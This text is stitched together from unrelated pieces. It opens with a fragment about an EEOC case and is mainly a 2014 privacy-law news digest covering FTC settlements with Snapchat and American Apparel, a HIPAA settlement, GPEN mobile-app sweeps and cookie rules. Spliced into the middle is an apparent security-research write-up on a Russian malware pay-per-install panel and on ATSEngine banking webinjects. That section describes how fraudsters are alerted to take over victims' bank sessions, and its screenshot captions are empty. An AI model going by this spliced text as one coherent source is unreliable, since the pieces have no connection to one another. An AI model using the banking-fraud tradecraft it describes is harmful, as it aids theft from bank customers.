Accordingly, when faced with an EEOC disparate impact investigation or charge, employers should consider arming themselves with consulting and/or potential testifying experts early on who can help formulate attacks against the EEOC’s disparate impact theories. As for the EEOC’s credit check/criminal background check crusade, this case demonstrates yet another instance where the EEOC has failed to successfully prove that an employer’s policy has a disparate impact on minority applicants.

French Data Protection Authority Reviews 100 Mobile Apps During Internet Sweep

On May 13, 2014, the French data protection authority (“CNIL”) decided to examine 100 mobile apps most commonly used in France.

In particular, the CNIL indicated that it will examine whether the mobile apps properly inform users of:

  • the categories of personal data collected (such as location data, contacts and device identifiers);
  • the purposes for which the data are collected;
  • whether personal data are shared with third parties; and
  • the right of mobile app users to object to the collection and sharing of their personal data.

This review takes place in connection with the Global Privacy Enforcement Network’s (“GPEN”) second annual enforcement sweep, which involves participation by the CNIL and 26 data protection authorities. The review will be conducted using a common grid that will be shared by all the participating data protection authorities in order to provide an inventory of worldwide mobile apps’ practices including country-specific activities.

The CNIL announced that it may carry out formal investigations and issue sanctions if its initial findings reveal serious breaches of the French Data Protection Act.

GPEN is an international network of more than 40 privacy enforcement authorities, including the U.S. Federal Trade Commission. Its mission includes connecting privacy authorities around the world to facilitate international privacy enforcement cooperation and coordination. GPEN conducted its first annual enforcement sweep in 2013, focusing on online transparency regarding organizations’ privacy practices. Notable, participation in the annual GPEN enforcement sweep increased from 19 authorities last year to 27 authorities this year.

U.S. Chamber of Commerce and Hunton Release Report on the Importance of Cross-Border Data Transfers to Global Prosperity

On May 12, 2014, the U.S. Chamber of Commerce released a report highlighting the benefits of cross-border data transfers across all sectors of the economy. Hunton & Williams LLP’s Global Privacy and Cybersecurity team developed the report with the Chamber of Commerce. The report, Business Without Borders: The Importance of Cross-Border Data Transfers to Global Prosperity, presents pragmatic solutions for developing international mechanisms that both protect privacy and facilitate cross-border data flows.

The report identifies key concepts critical to ensuring agile cross-border data transfer regimes that will support the global data flows of the future, including:

  • Recognition that there are many different approaches to regulating cross-border data transfers, and that differing mechanisms can ensure a similar desired level of data protection.
  • Movement away from rigid one-size-fits-all regulations toward more outcome-focused regimes.
  • A clear delineation between the issue of government access to data and the distinct issue of cross-border data transfers in a commercial context.
  • Assurance that the frameworks we develop today are fit for tomorrow.
  • Implementing strong, binding trade agreement commitments that prohibit data localization requirements, support unimpeded data flows, and encourage interoperability among privacy regimes.

“Many of the cross-border data transfer restrictions currently in place were established prior to the digital revolution,” said Lisa Sotto, head of the Global Privacy and Cybersecurity practice at Hunton & Williams LLP. “The laws were not crafted to address the ways in which businesses and consumers use data today. We need to rethink how we approach cross-border data flows so the global economy can continue to thrive now and into the future.”

Read the U.S. Chamber of Commerce’s blog entry on the report.

Read Hunton & Williams’ press release.

Sotto Addresses Cybersecurity Threat Preparation and Response

On May 7, 2014, IronBox Secure File Transfer hosted a webinar featuring “Queen of Breach” attorney Lisa Sotto, who shared her top tips in the event of a data breach. Lisa Sotto, partner and head of the Global Privacy and Cybersecurity practice at Hunton & Williams LLP, discussed the current cyber risk landscape and led participants through a hypothetical data breach scenario. She taught participants how to manage a data breach if the worst happens and provided key steps companies should take to prepare proactively for a cybersecurity event.

Participants were polled during the webinar, and the results showed:

  • Only 34% of participants have had specialized outside counsel review their business’ cybersecurity policies and procedures
  • Only 27% of participants felt “truly prepared” for a major cybersecurity event.

Access the full webinar and other related materials.

FTC Announces Settlement with American Apparel for Falsely Claiming Compliance with the Safe Harbor Framework

On May 9, 2014, the Federal Trade Commission announced a settlement with clothing manufacturer American Apparel related to charges that the company falsely claimed to comply with the U.S.-EU Safe Harbor Framework. According to the FTC’s complaint, the company violated Section 5 of the FTC Act by deceptively representing, through statements in its privacy policy, that it held a current Safe Harbor certification even though it had allowed the certification to expire.

The U.S.-EU Safe Harbor Framework is a cross-border data transfer mechanism that enables certified organizations to move personal data from the European Union to the United States in compliance with European data protection laws. To join the Safe Harbor Framework, a company must self-certify to the Department of Commerce that it complies with seven privacy principles (notice, choice, onward transfer, security, data integrity, access and enforcement) and related requirements that have been deemed to meet the EU’s adequacy standard.

Although the Commission alleged that the company’s conduct violated Section 5 of the FTC Act, the FTC noted that this does not necessarily mean the company committed any substantive violations of the Safe Harbor Framework’s privacy principles.

The proposed settlement agreement prohibits American Apparel from misrepresenting “in any manner, expressly or by implication, the extent to which [it] is a member of, adheres to, complies with, is certified by, is endorsed by, or otherwise participates in any privacy or security program sponsored by the government or any other self-regulatory or standard-setting organization”, including the U.S.-EU Safe Harbor Framework and the U.S.-Swiss Safe Harbor Framework.

In the press release accompanying the settlement, Jessica Rich, Director of the FTC’s Bureau of Consumer Protection, stated that “[t]he FTC is committed to making sure that when companies claim they’re participating in the U.S.-EU Safe Harbor Framework, they’re abiding by the terms of the program.”

Read the FTC Business Center Blog’s post about recent Safe Harbor settlements.

Update: On June 25, 2014, the FTC approved the final settlement order with American Apparel.

FTC Announces Settlement with Snapchat After Alleged Privacy and Security Misrepresentations

On May 8, 2014, the Federal Trade Commission announced a proposed settlement with Snapchat, Inc. (“Snapchat”) stemming from allegations that the company’s privacy policy misrepresented its privacy and security practices, including how the Snapchat mobile app worked. Snapchat’s app supposedly allowed users to send and receive photo and video messages known as “snaps” that would “disappear forever” after a certain time period. The FTC alleged that, in fact, it was possible for recipients to save snaps indefinitely, regardless of the sender-designated expiration time.

According to the complaint filed by the FTC, Snapchat made several misrepresentations about certain features of its app and the information collected through the app, including the following:

  • Snapchat portrayed its app as a “service for sending ‘disappearing’ photo and video messages” that required the sender to select a period of time (of a maximum of 10 seconds) within which the recipient could view the snap. The FTC’s complaint, however, indicates that there were several ways recipients could save and view snaps indefinitely, and that these methods were publicly available on the Internet at little or no cost. In addition, the FTC noted that although the flaw has been brought to Snapchat’s attention by a security researcher, Snapchat did nothing to mitigate the flaw for months.
  • Snapchat represented in the FAQs published on its website that the company would notify the sender if a recipient took a screenshot of the sender’s snap. But the FTC noted that the screenshot detection mechanism could easily be circumvented, so some senders were not notified when screenshots were taken of their snaps.
  • Snapchat allegedly collected information such as geolocation data and users’ contacts information contrary to representations the company made in its privacy policy.

The FTC also noted that numerous consumers complained that their phone numbers have been misused. According to the FTC, Snapchat failed to employ reasonable security measures to protect personal information from misuse and unauthorized disclosure by failing to verify phone numbers during the registration process.

The proposed settlement agreement prohibits Snapchat from misrepresenting the extent to which the company maintains the privacy, security and confidentiality of users’ information. As in other recent settlement agreements, Snapchat is required under the proposed settlement to implement a comprehensive privacy program subject to assessment by an independent privacy professional on a biennial basis for the next 20 years.

The FTC’s Business Center Blog post regarding Snapchat highlighted that “Snapchat is hardly the first company to get an early heads-up from a security researcher about a privacy hole in their product. Certainly, the preferred scenario is if glitches are spotted before you go to market. But the next best thing is to monitor what people are saying about your product and act ASAP if flaws come to light.”

The Snapchat case is part of an enforcement sweep by the Global Privacy Enforcement Network (“GPEN”), which is an international network of more than 40 privacy enforcement authorities, including the FTC.

Update: On December 31, 2014, the FTC approved the final settlement order with Snapchat.

HHS Announces 4.8 Million Dollar Settlement with New York Hospital and Medical School for Potential HIPAA Violations

On May 7, 2014, the Department of Health and Human Services (“HHS”) announced that NewYork-Presbyterian Hospital (“NYP”) and Columbia University (“CU”) agreed to collectively pay $4.8 million in the largest HIPAA settlement to date, to settle charges that they potentially violated the HIPAA Privacy and Security Rules.

According to HHS, NYP and CU operate a shared data network that links to patient information systems containing electronic protected health information (“ePHI”). The two entities submitted a joint breach report in September 2010 following the discovery that the ePHI of 6,800 individuals had been improperly disclosed due to a lack of technical safeguards, and was accessible to the public using Internet search engines. The ePHI included patient statuses, vital signs, medications and laboratory results.

Following the submission of the breach report, the HHS Office for Civil Rights (“OCR”) initiated an investigation and determined that neither entity had conducted an accurate and thorough risk analysis or developed an adequate risk management plan. OCR further concluded that NYP failed to implement appropriate policies and procedures for protecting its databases.

NYP agreed to pay $3.3 million and CU agreed to pay $1.5 million. In the resolution agreements, both entities also agreed to Corrective Action Plans that required each entity to:

  • undertake a thorough risk analysis;
  • develop and implement a risk management plan;
  • review and revise policies and procedures on information access management and device and media controls;
  • train staff that have access to ePHI; and
  • provide progress reports.

Additionally, CU must also “develop a process to evaluate any environmental or operational changes” that impact the security of the ePHI it maintains.

In announcing the settlement, Christina Heide, Acting Deputy Director of Health Information Privacy for OCR, noted that NYP and CU share the joint compliance burden and encouraged other entities to “make data security central to how they manage their information systems.” This marks the fourth HIPAA settlement in 2014, bringing the combined total monetary penalties so far this year to more than $7 million.

Bojana Bellamy Selected to Participate in EU-U.S. Privacy Bridge Initiative

Hunton & Williams LLP’s Centre for Information Policy Leadership president, Bojana Bellamy, has been selected to participate in the “Privacy Bridge Project,” a new transatlantic initiative that seeks to develop practical solutions to bridge the gap between European and U.S. privacy regimes. Bellamy joins a distinguished group of approximately 20 privacy experts from the EU and U.S., convened by Jacob Kohnstamm, Chairman of the Dutch Data Protection Authority and former Chairman of the Article 29 Working Party.

Although the regions share a common goal of effective privacy protection, misunderstandings and differences between transatlantic legal systems pose challenges to the free flow of information and privacy protection. The Privacy Bridge Project, which will address these challenges, is organized jointly by Daniel J. Weitzner of the Massachusetts Institute of Technology Information Policy Project and Nico van Eijk of the Institute for Information Law at the University of Amsterdam.

The first meeting of the Privacy Bridge Project was held in Amsterdam at the end of April 2014. The group will participate in four further meetings to prepare an initial report outlining policy recommendations and practical guidance for enabling cross-border data flows and promoting privacy on both sides of the Atlantic. The report will be presented at the 2015 International Conference of Privacy and Data Protection Commissioners, to be hosted by Kohnstamm in the Netherlands. Over the next 18 months, the group will prepare a consensus white paper proposing a modus vivendi between the two regions.

“Bridging existing gaps in the privacy frameworks of the European Union and the United States is vital for businesses, governments and citizens, and essential for economic prosperity. We must work from a set of common values and shared goals, and build on those commonalities rather than focus on differences,” Bellamy said. “I’m grateful to Jacob Kohnstamm for his vision and leadership on this important mission and excited by the possibilities. It will be an honor to work with such an esteemed group of privacy leaders.”

The Centre for Information Policy Leadership’s Senior Policy Advisor Fred H. Cate, Distinguished Professor and Director of the Indiana University Center for Applied Cybersecurity Research, also will participate in the project in his academic capacity.

Read the full press release.

GPEN Announces Coordinated International Enforcement Sweep on Mobile App Privacy

On May 6, 2014, the Office of the Privacy Commissioner of Canada announced the Global Privacy Enforcement Network’s (“GPEN’s”) second annual enforcement sweep. The sweep will focus on mobile app privacy and how mobile apps collect and use personal data.

From May 12 to 18, 2014, GPEN member authorities “will be looking at the types of permissions an app is seeking, whether those permissions exceed what would be expected based on the app’s functionality, and most importantly from a transparency perspective, how the app explains to consumers why it wants the personal information and what it will do with it.” Any problems identified during the sweep will result in follow-up enforcement actions and other outreach to address the affected apps.

GPEN is an international network of more than 40 privacy enforcement authorities, including the U.S. Federal Trade Commission. Its mission includes connecting privacy authorities around the world to facilitate international privacy enforcement cooperation and coordination. GPEN conducted its first annual enforcement sweep in 2013, focusing on online transparency regarding organizations’ privacy practices. It is noteworthy that participation in the annual GPEN enforcement sweep increased from 19 authorities last year to 27 authorities this year.

Coinciding with GPEN’s enforcement sweep, on May 8, 2014, the Federal Trade Commission announced a proposed settlement with Snapchat, Inc. stemming from allegations that the company misrepresented its privacy and security practices in its privacy policy, including how Snapchat’s mobile app worked.

SEC Issues New Guidance on the Use of Social Media

On April 21, 2014, the Securities and Exchange Commission’s Division of Corporation Finance published new Compliance and Disclosure Interpretations (“C&DIs”) concerning the use of social media in certain securities offerings, business combinations and proxy contests. Notably, the C&DIs permit the use of an active hyperlink to satisfy the cautionary legend requirements in social media communications when the social media platform limits the text or number of characters that may be included (e.g., Twitter). The C&DIs also clarify that postings or messages re-transmitted by unrelated third parties generally will not be attributable to the issuer (so issuers will not be required to ensure that third parties comply with the guidance). In addition, requirements regarding cautionary legends contemplated by the C&DIs apply to both issuers and other soliciting parties in proxy fights or tender offers. Accordingly, although the new guidance will allow issuers to communicate with their shareholders and potential investors via social media, it also may prove useful to activists in proxy fights and tender offers.

Read the full client alert on the SEC’s new C&DIs.

CFPB Proposes New GLB Privacy Notice Rule

On May 6, 2014, the Consumer Financial Protection Bureau (“CFPB”) announced a new proposed rule impacting privacy notices that financial institutions are required to issue under the Gramm-Leach-Bliley Act (“GLB”). Under the current GLB Privacy Rule, financial institutions must mail an annual privacy notice (the “GLB Privacy Notice”) to their customers that sets forth how they collect, use and disclose those customers’ nonpublic personal information (“NPI”) and whether customers may limit such sharing.

Under the proposed rule, certain financial institutions may forego the annual mailing requirement and instead include a brief disclosure in a billing statement or other communication that the GLB Privacy Notice is available online, then post that notice “in a clear and conspicuous manner” on the institution’s website. Financial institutions also must inform consumers that they may request a paper version of the GLB Privacy Notice by calling a toll-free number. To qualify for this online privacy notice option:

  • A financial institution must not share NPI with nonaffiliated third parties in a manner that requires an opt-out right be provided to customers;
  • The GLB Privacy Notice must not include an opt out pursuant to the Fair Credit Reporting Act;
  • The GLB Privacy Notice cannot be the only notice the financial institution provides to satisfy FCRA requirements;
  • The GLB Privacy Notice must not have changed since the last time it was provided to customers; and
  • The GLB Privacy Notice must use the model form regulators have developed to comply with the notice requirement.

If a financial institution does not meet all of the requirements listed above, it must continue to mail the GLB Privacy Notice annually to its customers. In announcing the proposed rule, CFPB Director Richard Cordray noted that the changes would both improve customers’ abilities to “find and access privacy policies” and reduce the costs “for industry to provide disclosures.”

German Court Requires Clear Opt-Out Notices for Web Analytics

On February 18, 2014, the Frankfurt am Main Regional Court issued a ruling addressing the use of opt-out notices for web analytics tools. The case concerned Piwik web analytics software and its “AnonymizeIP” function. The court held that website users must be informed clearly about their right to object to the creation of pseudonymized usage profiles. This information must be provided when a user first visits the website (e.g., via a pop-up or highlighted/linked wording on the first page) and must be accessible at all times (e.g., via a privacy notice).

Although the website provider in question had enabled an “anonymizing” function in Piwik, the court found that pseudonymized usage profiles were being created. To make that determination, the court drew on the Schleswig-Holstein data protection authority’s (“DPA’s”) detailed analysis of Piwik, as well as the federal German DPA’s formal resolution on web analytics.

Notably, the case was brought by a competitor of the website provider who argued that the website provider breached Germany’s Unfair Competition Act. This case, along with the Bavarian DPA’s reports on Adobe Analytics and Google Analytics, illustrates that web analytics continue to be a hot topic in Germany. The case also represents a broader trend in Germany of treating violations of data protection law as breaches of unfair competition law.

Install service for Malware affiliates and individuals

This install service was running since a long time but the server recently died.
People targeted are from Russia, Ukraine, Belarus, Kazakhstan, and Uzbekistan.


Statistics by days:
(Date, Unique visits, General visits)

Statistics by countries:
(Countries, Unique visits, Percentage, General visits)

Statistics by version:
(Version, Unique visits, Percentage, General visits)

Statistics by time:
(Time,  Users)

(Date, Already installed, ???? installed, Successfully installed, Copy failed, Modify failed, Register failed)

(Date, Begin update, Downloaded update, Executed update, No ATL, Execution failed)

Statistics by tasks:
(Date, Start of xxxx, Searches, Clicks, ???)

Statistics by sites:

Statistics by ads:

Loader, users list:
 (Nickname, ID, Priority, Ban, GEO, Days, General limit, Working conditions, Today, Summary, Size, Time, File)

There is some interesting people in this listing:
Severa (Know for FakeAV, Spam)
Malwox Affiliate (Mayachok.1)
Feodal cash Affiliate (Bitcoin malware)

And if you want to know about the EXE files loaded... all are malwares (Zeus,SpyEye, Russian lockers, Spam bots, Mayachok... etc..)
The x64 Zbot covered by Kaspersky also come from here.
The executables was rotating and was refreshed constantly, from this system, around 400 samples can be pulled per day.

Download statistics for client 191 ( Malwox TEST ):
(Date,  Derved, Executed, Ctr, Create, Exists, Down, Run, Unp)

Edit user:

Add user:

Schedule for user:

Menu: users list, add, FTP, Stats.

For the FTP list, most of accounts were with shell on them.


From the source:
$useZorkaJob = 0; //схч чрїюфр
$useSputnikJob = 0;
$useRekloJob = 0;
$useSpoiskJob = 0;
$useBegunCheatJob = 0;
Begun is one of the biggest ads services in Russia.


ATSEngine injects can be found oftenly inside Zeus configs, it makes the webinjects more dynamic because most of the content is located remotely and can be updated much easily instead of sending new config to all the bots.
It's the main difference with this, and a standard web inject inside Zeus.
One just allows you to do a static change in the page while the other gives you much more options, for example, customized webinjects, pop-ups, online requests for token etc...
ATSEngine have also a jabber alert feature, it let the fraudster know when the victim is logged to his bank account so it would be a god time to backconnect him (with the VNC feature of Zeus) and do the transaction.
Most of ATSEngine panels are also hosted on SSL because banks use SSL.

ATSEngine on a ZeusVM config.

ATSEngine on a Citadel config.
Example of figrabber.js from an ATSEngine panel.

Some guys do also a business with this type of web injects, for example:
He's offering a service for writing injects.
The title says "Auto-uploads and Injects from professionals for professionals"
The rest of the text explains how the service works, it's more a terms and conditions post rather than a technical description of the product, about moneyback, privacy, guarantees and other stuff.
They dont write mobile botnets, trojan horses, traffic direction systems or other malware software except injects, also they dont guarantee bypass of protection (like Rapport).
yummba is know anyway for writing injects for ATSEngine.

Let's have a look on a C&C now..



Options main:

Options Jabber:

Another panel, on SSL:

Another panel, on SSL:

Another panel, still on SSL:


Additional fields rules:

Additionnal fields rules (texts):

Edit rule:

Edit text:

VBV/MCSC rules:

Add a rule:


Options (CC Checker):

Files, dumped from another panel, targeting La banque Postal (a French bank):

White House Releases Report on Big Data

On May 1, 2014, the White House released a report examining how Big Data is affecting government, society and commerce. In addition to questioning longstanding tenets of privacy legislation, such as notice and consent, the report recommends (1) passing national data breach legislation, (2) revising the Electronic Communications Privacy Act (“ECPA”), and (3) advancing the Consumer Privacy Bill of Rights.

The report states that consumers have a “right to know if [their] information has been stolen or otherwise improperly exposed” and continues that data breaches are currently regulated by a “patchwork” of 47 state laws. The report recommends that Congress pass legislation providing a single data breach standard, similar to the Obama administration’s May 2011 proposal. The data breach legislation should include “reasonable time periods for notification, minimize interference with law enforcement investigations, and potentially prioritize notification about large, damaging incidents over less significant incidents.”

The report also recommends revising ECPA to confirm that online, digital content is protected in the same manner as hard copy materials. For example, the report recommends removing distinctions in ECPA that focus on how long an email has been left unread.

The White House’s Big Data report also recommends advancing the Consumer Privacy Bill of Rights released by the Obama administration in February 2012. Specifically, the report calls on the Department of Commerce to seek public comment on the Consumer Privacy Bill of Rights, and then draft legislation for review by the President and Congress.

Read the White House’s Fact Sheet on the Big Data and Privacy Working Group Review.

Belgian Privacy Commission Opens Public Consultation on Draft Cookie

On April 24, 2014, the Belgian Data Protection Authority (the “Privacy Commission”) published a Draft Recommendation regarding cookie usage, inviting all stakeholders to provide their input on the text. The Draft Recommendation clarifies the Belgian legal framework for the use of cookies and similar technologies, examining in detail the different purposes for which cookies and similar technologies may be used (e.g., authentication, storage of preferences) and explaining the steps to be taken to ensure compliance for each type of cookie use.

In particular, the Draft Recommendation explains how to comply with the new obligation to obtain prior consent before placing or accessing cookies and similar technologies on users’ devices, as provided by Article 129 of the Belgian Electronic Communications Act (which transposes Article 5.3 of the revised e-Privacy Directive 2002/58/EC). Consent is not required if the cookie or similar technology is used for the sole purpose of carrying out the transmission of a communication over an electronic communications network, or if it is strictly necessary for the provision of a service requested by the user. The Draft Recommendation provides examples of cookies that fall under these exceptions (e.g., “shopping basket” cookies, authentication cookies).

According to the Draft Recommendation, to obtain valid consent to use cookies and similar technologies, users must have the opportunity to accept only certain cookies and refuse others, and be able to change their choices later on. Valid consent requires an affirmative action by the user. In addition, prior to providing consent, users must have a chance to review a cookie policy that details the different categories of cookies and their purposes, the categories of information stored, the retention period, how to delete cookies, and any disclosures of information to third parties. The Draft Recommendation provides useful examples of such cookie policies.

Comments on the Draft Recommendation may be sent to the Privacy Commission by mail (rue de la Presse, 35 – 1000 Brussels) or by email ( The public consultation will be closed on July 31, 2014, after which the Privacy Commission will publish the final version of the Recommendation.